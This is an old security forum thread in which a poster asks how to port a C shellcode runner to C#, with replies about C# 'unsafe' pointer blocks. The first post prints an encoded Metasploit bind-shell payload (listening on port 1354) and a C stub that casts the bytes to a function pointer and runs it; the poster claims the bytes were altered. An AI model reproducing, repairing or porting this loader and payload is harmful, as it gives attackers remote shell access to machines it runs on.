Hey anyone been able to run shellcode in C#?
Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Hey anyone been able to run shellcode in C#?

  1. #1
    Senior Member
    Join Date
    Jun 2002
    Posts
    102

    Hey anyone been able to run shellcode in C#?

    Alright not totally the best topic but I have to learn this .net C# stuff for work and was messing around with it but it's not totally how I would do it in C there are some little differences. So I grabbed some shellcode from metasploit (i'm lazy) for their Bind Shell and just can't get it to fire off. I guess I'm basically trying to get some help in porting it over.

    Here is my c code
    (waring don't run it binds to port 1354, I also messed with the shell code to keep script kiddies away)

    Code:
    //funky_bunny.c
    
    unsigned char bunny[] =
    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef"
    "\x63\xf6\xfd\x83\xeb\xfc\xe2\xf4\x13\x09\x1d\xb0\x07\x9a\x09\x02"
    "\x10\x03\x7d\x91\xcb\x47\x7d\xb8\xd3\xe8\x8a\xf8\x97\x62\x19\x76"
    "\xa0\x7b\x7d\xa2\xcf\x62\x1d\xb4\x64\x57\x7d\xfc\x01\x52\x36\x64"
    "\x43\xe7\x36\x89\xe8\xa2\x3c\xf0\xee\xa1\x1d\x09\xd4\x37\xd2\xd5"
    "\x9a\x86\x7d\xa2\xcb\x62\x1d\x9b\x64\x6f\xbd\x76\xb0\x7f\xf7\x16"
    "\xec\x4f\x7d\x74\x83\x47\xea\x9c\x2c\x52\x2d\x99\x64\x20\xc6\x76"
    "\xaf\x6f\x7d\x8d\xf3\xce\x7d\xbd\xe7\x3d\x9e\x73\xa1\x6d\x1a\xad"
    "\x10\xb5\x90\xae\x89\x0b\xc5\xcf\x87\x14\x85\xcf\xb0\x37\x09\x2d"
    "\x87\xa8\x1b\x01\xd4\x33\x09\x2b\xb0\xea\x13\x9b\x6e\x8e\xfe\xff"
    "\xba\x09\xf4\x02\x3f\x0b\x2f\xf4\x1a\xce\xa1\x02\x39\x30\xa5\xae"
    "\xbc\x30\xb5\xae\xac\x30\x09\x2d\x89\x0b\xf3\xb7\x89\x30\x7f\x1c"
    "\x7a\x0b\x52\xe7\x9f\xa4\xa1\x02\x39\x09\xe6\xac\xba\x9c\x26\x95"
    "\x4b\xce\xd8\x14\xb8\x9c\x20\xae\xba\x9c\x26\x95\x0a\x2a\x70\xb4"
    "\xb8\x9c\x20\xad\xbb\x37\xa3\x02\x3f\xf0\x9e\x1a\x96\xa5\x8f\xaa"
    "\x10\xb5\xa3\x02\x3f\x05\x9c\x99\x89\x0b\x95\x90\x66\x86\x9c\xad"
    "\xb6\x4a\x3a\x74\x08\x09\xb2\x74\x0d\x52\x36\x0e\x45\x9d\xb4\xd0"
    "\x11\x21\xda\x6e\x62\x19\xce\x56\x44\xc8\x9e\x8f\x11\xd0\xe0\x02"
    "\x9a\x27\x09\x2b\xb4\x34\xa4\xac\xbe\x32\x9c\xfc\xbe\x32\xa3\xac"
    "\x10\xb3\x9e\x50\x36\x66\x38\xae\x10\xb5\x9c\x02\x10\x54\x09\x2d"
    "\x64\x34\x0a\x7e\x2b\x07\x09\x2b\xbd\x9c\x26\x95\x1f\xe9\xf2\xa2"
    "\xbc\x9c\x20\x02\x3f\x63\xf6\xfe";
    
    int main(int argc, char **argv)
    {
    	int (*funky)();
    	funky = (int (*)()) bunny;
    	(int)(*funky)();
    }
    Good Grief

  2. #2
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    Hiya,

    I've never programmed in c# before, in fact im not even sure why theres such a big crazy with it....(anyone inform me??)

    but yea the way pointers work in c# appears to require more syntax (and different) than C, this is how far I got with porting it, still have no idea whether its near correct, or whether it i algothimically correct - i'd have to learn the syntax further

    Code:
    int funky;
    *p = <something goes here>
    
    funky = int.Format((int)p,<something goes here> );
    So yea maybe its a start, maybe its not. You seem to be required to "format" pointers in C#

    let me know how you get on, im interested

    cheers

    i2c

  3. #3
    Senior Member
    Join Date
    Jun 2002
    Posts
    174
    I do believe that in order to use pointers anywhere in C#, you must declare the class, method, or block as "unsafe".... you may only declare and use pointers in those blocks.

    Code:
    static void Main()
    {
    
     //no pointers
    
    
    unsafe
    {
     //pointers
    }
    
    
    //no pointers
    }
    I\'m back.

  4. #4
    Elite Hacker
    Join Date
    Mar 2003
    Posts
    1,407
    I'm not sure I understand. Do you have to get shellcode to work in C# for work? Or is that just something you were messing around with to learn C#? I've never seen anything about shellcode in C#, but then again I've never looked. Good luck anyway. Hopefully you get it figured out.

  5. #5
    Senior Member
    Join Date
    Jun 2002
    Posts
    174
    Originally posted here by h3r3tic
    I'm not sure I understand. Do you have to get shellcode to work in C# for work? Or is that just something you were messing around with to learn C#?
    Perhaps he is a 1337 |-|4x0|2... or perhaps he's just trying to write an uber-low-level service which listens on port 1354... IMO, what he's doing with it is his business... so long as he's not making it blatently obvious that he's implementing this for some ill-intent, then...meh... I'll play dumb.
    I\'m back.

  6. #6
    Senior Member
    Join Date
    Jun 2002
    Posts
    102
    lol this is so funny....

    embro1001 i'm a chick and i'm not being a 1337 |-|4x0|2 (wtf is that). No I don't have to write it for work lol. I find the easiest way to learn a language is to make example programs and have some fun with it. This is just one little app I made just to try and learn a language but I got stuck with it and asked for some help since there isn't much about shellcode and C# out there i thought someone on a security forum might help me out. So that's my big reason I guess. I can figure it out on my own and if I figure it out then super if not it's not going to mean much.
    Good Grief

  7. #7
    Senior Member
    Join Date
    Jun 2002
    Posts
    174
    embro1001 i'm a chick and i'm not being a 1337 |-|4x0|2 (wtf is that).
    Sex seems to lose it's meaning on these forums... I usually opt for the generic "he"... my bad.

    No I don't have to write it for work lol. I find the easiest way to learn a language is to make example programs and have some fun with it.
    Rock on. Me too.

    This is just one little app I made just to try and learn a language but I got stuck with it and asked for some help since there isn't much about shellcode and C# out there i thought someone on a security forum might help me out.
    So you're a "chick", huh? Maybe we can get some coffee or something.

    So that's my big reason I guess. I can figure it out on my own and if I figure it out then super if not it's not going to mean much.
    Maybe some dinner... movie... WHOA! Offtopic! Sorry! Seriously though, I wasn't accusing you of anything... I was just making fun h3r3tic carefully doubt-filled questions. Three cheers.
    I\'m back.

  8. #8
    C# is like java, it handles memory management and garbage collection and yadda yadda. I'm probably wrong in saying this but I think it works as a rule of thumb. In java, if you want a b. overflow, you need to break the java machine itself. I think the same applies with C#. Break .net and you can run shellcode.

    I'm curious as well, if anyone can fill in the details it would be handy.

  9. #9
    Ninja Code Monkey
    Join Date
    Nov 2001
    Location
    Washington State
    Posts
    1,027
    You can do c/c++ style memory management by using the unsafe keywords and so on. It's all built in so you can deal with libraries built in c and c++ like direct x.

    You just need to do the proper amount of research and experimentation. You probably won't get much help on it here....most here are not that strong with development and even less actually use .net .
    "When I get a little money I buy books; and if any is left I buy food and clothes." - Erasmus
    "There is no programming language, no matter how structured, that will prevent programmers from writing bad programs." - L. Flon
    "Mischief my ass, you are an unethical moron." - chsh
    Blog of X

  10. #10
    Senior Member
    Join Date
    Jun 2002
    Posts
    174
    You're both right... The bytecode that .NET languages compile to (IL) behaves a lot like Java, but those "clever" M$haft engineers figured that people may still need to use unsafe code. If you look on their site, they really don't recommend it, as you can get some pretty unusual results if you're not careful (i.e., the .NET runtime goes kaput).

    This is the first time I've ever seen someone attempt to do an overflow/sploit-like program in C#, though... it just seems to high-level.
    I\'m back.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •